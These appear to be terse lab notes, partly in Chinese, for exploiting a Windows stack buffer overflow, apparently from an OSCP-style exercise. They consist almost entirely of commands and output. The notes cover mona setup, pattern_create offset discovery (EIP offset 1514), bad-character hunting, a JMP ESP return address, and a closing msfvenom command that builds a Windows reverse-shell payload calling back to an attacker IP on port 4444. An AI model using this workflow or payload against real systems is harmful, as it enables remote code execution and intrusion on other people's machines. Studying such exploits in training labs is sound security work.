nc 10.10.16.52 1337

xfreerdp /u:admin /p:password /cert:ignore /v:10.10.16.52 /workarea

!mona config -set workingfolder c:\mona\%p

最大探测数：1600

生成指定长度不重复字节：（比fuzzing探测出来的字节长一点）
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1800

EIP 356B4134


找到offiset   

!mona findmsp -distance 1800


offiset 1514

!mona bytearray -b "\x00"

生成字节码：

for x in range(1, 256):
  print("\\x" + "{:02x}".format(x), end='')
print()


ESP 0195FA30

!mona compare -f C:\mona\oscp\bytearray.bin -a 0195FA30

POSSIBLY BAD CHARS:04,05,3e,3f,e1,e2


!mona bytearray -b "\x00\x04\x3e\x3f\xe1"



ESP 01A0FA30

!mona compare -f C:\mona\oscp\bytearray.bin -a 01A0FA30


根据坏字节查找到可以利用的shellcode的静态地址
!mona jmp -r esp -cpb "\x00\x04\x3e\x3f\xe1"


找到静态地址：625011af

retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16


生成shellcode:
msfvenom -p windows/shell_reverse_tcp LHOST=10.17.9.218 LPORT=4444 EXITFUNC=thread -b "\x00\x04\x3e\x3f\xe1" -f c